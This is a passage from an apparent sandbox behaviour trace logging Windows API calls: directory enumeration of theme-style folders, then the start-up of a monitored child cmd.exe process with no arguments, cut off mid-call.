nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="BLENDS", cAlternateFileName="")) returned 1 [0186.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.658] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27a70c44, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27a70c44, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27a70c44, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="BLUECALM", cAlternateFileName="")) returned 1 [0186.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.658] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27abcfff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27ae323c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27ae323c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="BLUEPRNT", cAlternateFileName="")) returned 1 [0186.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.658] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27a96da3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27abcfff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27abcfff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="BOLDSTRI", cAlternateFileName="")) returned 1 [0186.659] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.659] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27a96da3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27abcfff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27abcfff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="BREEZE", cAlternateFileName="")) returned 1 [0186.659] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.659] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27abcfff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27abcfff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27abcfff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="CANYON", cAlternateFileName="")) returned 1 [0186.659] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.659] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27abcfff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27abcfff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27abcfff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="CAPSULES", cAlternateFileName="")) returned 1 [0186.659] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.659] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27ae323c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27ae323c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27ae323c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="CASCADE", cAlternateFileName="")) returned 1 [0186.660] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.660] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27ae323c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27ae323c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27ae323c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="COMPASS", cAlternateFileName="")) returned 1 [0186.660] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.660] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27abcfff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b094aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b094aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="CONCRETE", cAlternateFileName="")) returned 1 [0186.660] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.660] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27ae323c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b094aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b094aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="DEEPBLUE", cAlternateFileName="")) returned 1 [0186.661] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.661] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27ae323c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c86bce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ECHO", cAlternateFileName="")) returned 1 [0186.661] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.661] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b094aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c86bce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ECLIPSE", cAlternateFileName="")) returned 1 [0186.661] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.661] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b094aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b094aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b094aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="EDGE", cAlternateFileName="")) returned 1 [0186.661] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.661] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b094aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b2f705, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b2f705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="EVRGREEN", cAlternateFileName="")) returned 1 [0186.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.662] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b094aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b2f705, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b2f705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="EXPEDITN", cAlternateFileName="")) returned 1 [0186.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.662] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b094aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27ba1ded, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27ba1ded, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ICE", cAlternateFileName="")) returned 1 [0186.662] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.662] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b5591d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bee2a4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bee2a4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="INDUST", cAlternateFileName="")) returned 1 [0186.663] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.663] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b5591d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b7bb91, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b7bb91, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="IRIS", cAlternateFileName="")) returned 1 [0186.663] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.663] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b5591d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bc8052, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bc8052, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="JOURNAL", cAlternateFileName="")) returned 1 [0186.663] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.663] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b7bb91, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27ba1ded, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27ba1ded, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="LAYERS", cAlternateFileName="")) returned 1 [0186.663] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.663] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b7bb91, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bc8052, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bc8052, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="LEVEL", cAlternateFileName="")) returned 1 [0186.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.664] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bc8052, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bc8052, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bc8052, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="NETWORK", cAlternateFileName="")) returned 1 [0186.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.664] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bc8052, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bc8052, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bc8052, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="PAPYRUS", cAlternateFileName="")) returned 1 [0186.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.664] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bc8052, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bee2a4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bee2a4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="PIXEL", cAlternateFileName="")) returned 1 [0186.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.665] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bc8052, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bc8052, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bc8052, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="PROFILE", cAlternateFileName="")) returned 1 [0186.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.665] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bc8052, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bee2a4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bee2a4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="QUAD", cAlternateFileName="")) returned 1 [0186.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.665] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bee2a4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bee2a4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bee2a4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="RADIAL", cAlternateFileName="")) returned 1 [0186.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.665] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bee2a4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bee2a4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bee2a4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="REFINED", cAlternateFileName="")) returned 1 [0186.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.666] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bee2a4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c144f9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c144f9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="RICEPAPR", cAlternateFileName="")) returned 1 [0186.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.666] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bee2a4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c144f9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c144f9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="RIPPLE", cAlternateFileName="")) returned 1 Thread: id = 118 os_tid = 0x4f4 Process: id = "13" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x736ef000" os_pid = "0xc40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x2a8" cmd_line = "\"C:\\WINDOWS\\system32\\cmd.exe\"" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 82 os_tid = 0xc48 [0182.781] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff695310000 [0182.781] __set_app_type (_Type=0x1) [0182.781] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff695326d00) returned 0x0 [0182.781] __getmainargs (in: _Argc=0x7ff695349200, _Argv=0x7ff695349208, _Env=0x7ff695349210, _DoWildCard=0, _StartInfo=0x7ff69534921c | out: _Argc=0x7ff695349200, _Argv=0x7ff695349208, _Env=0x7ff695349210) returned 0 [0182.781] _onexit (_Func=0x7ff695327fd0) returned 0x7ff695327fd0 [0182.782] _onexit (_Func=0x7ff695327fe0) returned 0x7ff695327fe0 [0182.782] _onexit (_Func=0x7ff695327ff0) returned 0x7ff695327ff0 [0182.782] _onexit (_Func=0x7ff695328000) returned 0x7ff695328000 [0182.782] _onexit (_Func=0x7ff695328010) returned 0x7ff695328010 [0182.782] _onexit (_Func=0x7ff695328020) returned 0x7ff695328020 [0182.783] GetCurrentThreadId () returned 0xc48 [0182.783] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc48) returned 0x70 [0182.783] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff8c81c0000 [0182.783] GetProcAddress (hModule=0x7ff8c81c0000, lpProcName="SetThreadUILanguage") returned 0x7ff8c81da990 [0182.783] SetThreadUILanguage (LangId=0x0) returned 0x409 [0184.036] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0184.036] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x23aecffea8 | out: phkResult=0x23aecffea8*=0x0) returned 0x2 [0184.036] VirtualQuery (in: lpAddress=0x23aecffe94, lpBuffer=0x23aecffe10, dwLength=0x30 | out: lpBuffer=0x23aecffe10*(BaseAddress=0x23aecff000, AllocationBase=0x23aec00000, AllocationProtect=0x4, __alignment1=0xffff9f81, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0184.037] VirtualQuery (in: lpAddress=0x23aec00000, lpBuffer=0x23aecffe10, dwLength=0x30 | out: lpBuffer=0x23aecffe10*(BaseAddress=0x23aec00000, AllocationBase=0x23aec00000, AllocationProtect=0x4, __alignment1=0xffff9f81, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0184.037] VirtualQuery (in: lpAddress=0x23aec01000, lpBuffer=0x23aecffe10, dwLength=0x30 | out: lpBuffer=0x23aecffe10*(BaseAddress=0x23aec01000, AllocationBase=0x23aec00000, AllocationProtect=0x4, __alignment1=0xffff9f81, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0184.037] VirtualQuery (in: lpAddress=0x23aec04000, lpBuffer=0x23aecffe10, dwLength=0x30 | out: lpBuffer=0x23aecffe10*(BaseAddress=0x23aec04000, AllocationBase=0x23aec00000, AllocationProtect=0x4, __alignment1=0xffff9f81, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0184.037] VirtualQuery (in: lpAddress=0x23aed00000, lpBuffer=0x23aecffe10, dwLength=0x30 | out: lpBuffer=0x23aecffe10*(BaseAddress=0x23aed00000, AllocationBase=0x23aed00000, AllocationProtect=0x4, __alignment1=0xffff9f81, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0184.037] GetConsoleOutputCP () returned 0x1b5 [0184.794] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff69534fbb0 | out: lpCPInfo=0x7ff69534fbb0) returned 1 [0184.794] SetConsoleCtrlHandler (HandlerRoutine=0x7ff695338150, Add=1) returned 1 [0184.794] _get_osfhandle (_FileHandle=1) returned 0x254 [0184.795] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff69534fc04 | out: lpMode=0x7ff69534fc04) returned 0 [0184.795] _get_osfhandle (_FileHandle=0) returned 0x248 [0184.795] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff69534fc00 | out: lpMode=0x7ff69534fc00) returned 0 [0184.795] _get_osfhandle (_FileHandle=1) returned 0x254 [0184.795] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0184.795] _get_osfhandle (_FileHandle=1) returned 0x254 [0184.795] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff69534fc08 | out: lpMode=0x7ff69534fc08) returned 0 [0184.795] _get_osfhandle (_FileHandle=0) returned 0x248 [0184.795] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff69534fc0c | out: lpMode=0x7ff69534fc0c) returned 0 [0184.795] GetEnvironmentStringsW () returned 0x1ce53625a10* [0184.795] GetProcessHeap () returned 0x1ce53620000 [0184.795] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xa7c) returned 0x1ce536264a0 [0184.795] FreeEnvironmentStringsA (penv="A") returned 1 [0184.795] GetProcessHeap () returned 0x1ce53620000 [0184.795] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x8) returned 0x1ce53626f30 [0184.795] GetEnvironmentStringsW () returned 0x1ce53625a10* [0184.795] GetProcessHeap () returned 0x1ce53620000 [0184.795] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xa7c) returned 0x1ce53626f50 [0184.795] FreeEnvironmentStringsA (penv="A") returned 1 [0184.795] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, 